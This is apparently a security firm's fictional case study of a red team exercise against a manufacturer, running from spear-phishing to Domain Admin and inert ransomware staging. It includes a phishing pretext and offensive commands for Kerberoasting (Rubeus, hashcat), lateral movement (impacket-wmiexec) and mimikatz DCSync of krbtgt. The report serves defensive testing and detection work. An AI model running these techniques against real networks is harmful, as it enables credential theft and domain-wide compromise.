SecureSan Technologies
Red Team · Full-Scope

From a Phishing Email to Enterprise-Wide Ransomware: A Red Team Simulation

ManufacturingFull-scope Red Team12-day engagementDomain Admin achieved4× detection gain
Illustrative case study. The organisation, personnel, and data below are fictional and created for demonstration. Every technique, tool, payload, and configuration shown is technically accurate and representative of real SecureSan engagements.

01Executive Summary

SecureSan Technologies conducted a full-scope red team simulation for Halden Manufacturing (a fictional industrial manufacturer), emulating a financially-motivated ransomware operator. Beginning with a single spear-phishing email, our operators established a foothold, harvested credentials, moved laterally, escalated to Domain Administrator, and demonstrated the pre-conditions for enterprise-wide ransomware deployment — all without triggering an effective response from the security team.

The objective was not to break things, but to measure how far a realistic adversary could get and how quickly the blue team would detect them. The simulated ransomware payload was inert and deployed only to a controlled set of test hosts. The exercise produced 16 findings and, more importantly, a prioritised roadmap that closed the most dangerous gaps — validated in a follow-up purple-team exercise with a measured 4× improvement in detection coverage.

Time from phishing click to Domain Admin: under six hours. Time to detection by the blue team: it did not happen. Those two numbers are the report.

02Client Background

Halden Manufacturing (fictional) is an industrial manufacturer (~4,000 employees) with a large Windows/Active Directory estate, hybrid cloud, and OT-adjacent corporate systems.

03Business Challenges

Manufacturing has been among the hardest-hit sectors for ransomware, where operational downtime translates directly into lost production. Halden had invested in EDR and awareness training and wanted an honest answer to a board-level question: "If a phishing email lands and someone clicks, does our stack actually stop it — and would we even know?" A red team is the only assessment that answers this end-to-end.

04Engagement Scope

Full-scope, objective-based red team with a narrow "trusted agent" group aware of the test. Realistic constraints: no prior access, no allow-listing of our infrastructure, and the blue team not informed, to measure genuine detection and response.

In scopeOut of scope / constrained
Phishing against a target employee setOT / production control systems (strictly off-limits)
Endpoint compromise, lateral movement, AD escalationReal data destruction or encryption
Demonstrating ransomware pre-conditions (inert payload)Denial-of-service against production
Detection & response measurementPhysical intrusion

A signed authorization, deconfliction process, and an emergency stop procedure were in place throughout.

05Testing Methodology

The exercise followed a recognised adversary-emulation lifecycle, mapped end-to-end to MITRE ATT&CK and executed per PTES and the NIST SP 800-115 technical testing framework.

Testing methodology pipelineRecon / OSINTInitial AccessFoothold / C2Priv-EscLateral MovementDomain DominanceObjective

06Assessment Timeline

PhaseDaysActivity
Reconnaissance1–3OSINT, email-address harvesting, pretext development
Initial access4Spear-phishing campaign; foothold on first click
Escalation & movement5–7Credential harvest, lateral movement, AD escalation to DA
Objective8Backup access, inert ransomware demonstration on test hosts
Reporting & purple team9–12Findings, then a collaborative detection-tuning exercise

07Environment Details

ItemDetail
DirectoryOn-prem Active Directory, single forest, multiple domains
EndpointsWindows 10/11, EDR agent deployed fleet-wide
EmailMicrosoft 365 with a mail-filtering gateway
Weak points (discovered)Kerberoastable service accounts, over-privileged users, flat network, unmonitored backups

08Tools Used

09Attack Surface Analysis

The corporate attack surface for a ransomware operator is dominated by people and identity, not perimeter exploits — consistent with 2026's breach data, where intrusions overwhelmingly begin with a person rather than a software flaw.

SurfaceWeakness soughtOutcome
Email / peopleSusceptibility to a credible pretextInitial access achieved
EndpointMacro execution, EDR gapsFoothold & C2
Active DirectoryKerberoasting, over-privilege, delegationDomain Admin
BackupsReachable, unmonitoredRansomware pre-condition

10Reconnaissance Process

OSINT built a target list and a credible pretext (an internal-looking "benefits portal update"). We identified employees in finance and HR whose roles made the pretext plausible, and registered a look-alike domain. A test email confirmed our infrastructure passed the mail gateway.

# Pretext email (abbreviated) — from a look-alike domain
From: hr-benefits@halden-manufacturing-hr.example
Subject: Action required: confirm your 2026 benefits election
Body: ... "Please review and confirm before Friday" ...
Attachment: 2026_Benefits_Election.docm   # macro-enabled

11Vulnerability Discovery

Finding 1 — Successful phishing & macro execution (High)

Multiple recipients opened the document and enabled macros. The macro executed a loader that established C2, giving us an interactive foothold on a corporate workstation.

Finding 2 — Kerberoastable service accounts with weak passwords (High)

BloodHound mapped a short path to Domain Admin. Several service accounts were Kerberoastable and used weak, crackable passwords.

Finding 3 — Over-privileged accounts & flat network (High)

Workstations could reach domain controllers and each other freely; several standard users held excessive privileges. This is the topology that lets one foothold become domain-wide compromise.

Finding 4 — Reachable, unmonitored backups (Critical)

Backup infrastructure was reachable from the compromised tier and had no alerting — the single most important enabler of a successful ransomware outcome.

12Technical Exploitation Walkthrough

Step 1 — Foothold & local recon

# Post-exploitation on the initial host (via C2)
beacon> whoami /groups
beacon> execute-assembly SharpHound.exe -c All
[+] Collected 4,112 objects; uploading for BloodHound analysis

Step 2 — Kerberoast a service account

beacon> execute-assembly Rubeus.exe kerberoast /nowrap
[*] SamAccountName : svc-sql-reporting
[*] Hash (crackable) : $krb5tgs$23$*svc-sql-reporting*...

# Offline crack
$ hashcat -m 13100 hashes.txt rockyou.txt
svc-sql-reporting:Summer2025!   # weak, cracked in minutes
[Screenshot: BloodHound graph showing the shortest path from the compromised user to Domain Admins]

Step 3 — Lateral movement

# Move to a server where a privileged session is present
$ impacket-wmiexec halden/svc-sql-reporting:'Summer2025!'@10.20.4.15
C:\> [interactive shell on target]

Step 4 — Domain dominance via DCSync

Having reached an account with replication rights, we extracted the domain's credential material without ever touching a domain controller's disk:

beacon> mimikatz lsadump::dcsync /user:halden\krbtgt
[*] Object RID : 502
[*] Credentials:
    Hash NTLM: <krbtgt hash — full domain compromise>

Control of the krbtgt hash is effective Domain Admin: it enables forged "golden" tickets for any user. We had achieved domain dominance in under six hours of active operation.

Step 5 — Demonstrate the ransomware pre-condition (inert)

We confirmed we could reach and disable backups and push a payload via existing management tooling to a controlled set of test hosts only. The payload was inert — it wrote a harmless marker file instead of encrypting — proving deployment capability without any real impact:

# Inert demonstration — writes a marker, does NOT encrypt
PS> Invoke-Command -ComputerName $testHosts -ScriptBlock {
      Set-Content C:\redteam_marker.txt "SecureSan RT — inert payload"
    }
[+] Marker delivered to 12 designated test hosts. No production impact.

13Attack Chain

The full kill chain, mapped to the phases a real ransomware operator would follow:

Phishing-to-ransomware red team kill chainSpear-phishing email with macro docMacro executes loader, C2 establishedLocal recon + credential harvest(Mimikatz)Lateral movement via SMB / WMIKerberoast + DCSync -> Domain AdminDisable backups, deploy ransomwaredomain-wide

14Business Impact

15MITRE ATT&CK Mapping

TacticTechniqueID
ReconnaissanceGather Victim Identity InformationT1589
Initial AccessPhishing: Spearphishing AttachmentT1566.001
ExecutionUser Execution: Malicious FileT1204.002
Credential AccessSteal or Forge Kerberos Tickets: KerberoastingT1558.003
Credential AccessOS Credential Dumping: DCSyncT1003.006
Lateral MovementRemote Services: SMB / WMIT1021.002 / T1021.003
ImpactData Encrypted for Impact (demonstrated inert)T1486
ImpactInhibit System Recovery (backup access)T1490

16CVSS Scoring

Red team findings are assessed by attack-path risk rather than single-issue CVSS, but the individual enabling vulnerabilities were scored:

FindingCVSS 3.1Severity
Reachable/unmonitored backups8.1 (AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)Critical
Kerberoastable accounts, weak passwords8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)High
Flat network / over-privilege7.7High
Phishing susceptibilityN/A (people/process)High

17Risk Matrix

Likelihood → / Impact ↓LowMediumHigh
SevereBackups reachable + DA
MajorKerberoastingNo detection/response
ModerateFlat networkPhishing susceptibility
MinorVerbose SMB shares

18Evidence Collected

Indicators of Compromise (provided for detection engineering)

- Macro-enabled attachment from a look-alike domain
- Loader beaconing to attacker C2 (JA3 / domain IoCs supplied)
- SharpHound LDAP collection bursts
- Rubeus/Kerberoast TGS requests for many SPNs in a short window
- DCSync replication requests from a non-DC host
- Backup service accessed from a workstation tier

19Root Cause Analysis

20Remediation Recommendations

Immediate

Short term

Strategic

21Security Improvements After Remediation

Following remediation we ran a collaborative purple-team exercise, replaying the same techniques with the blue team watching:

22Lessons Learned

23Key Metrics

16
Findings
<6h
Click to Domain Admin
0
Blue-team detections (initial)
Detection coverage gain
1
Phishing email to foothold
0
Production systems impacted
12
Day engagement
100%
Critical paths closed

24Conclusion

A single phishing email became domain-wide ransomware capability in under six hours, entirely undetected. The value of the exercise was not the compromise — it was the honest measurement of prevention and detection, and the roadmap that followed. After remediation and a purple-team validation, Halden could detect the critical steps of the same attack in minutes.

Why This Matters

Ransomware operators do not use magic. They phish someone, harvest a credential, abuse Active Directory, find the backups, and encrypt. Every step is well-understood and defensible — but only if you have tested whether your defences actually fire. Most organisations discover their detection gaps during a real incident, at the worst possible time and cost.

A red team surfaces those gaps on your terms, with an inert payload and an emergency stop, for a fraction of a single day of ransomware downtime. You can rehearse the attack, or you can improvise during the real one. SecureSan's Assurance and Nexus practice exists to make sure the rehearsal is the only time it happens.

← All case studies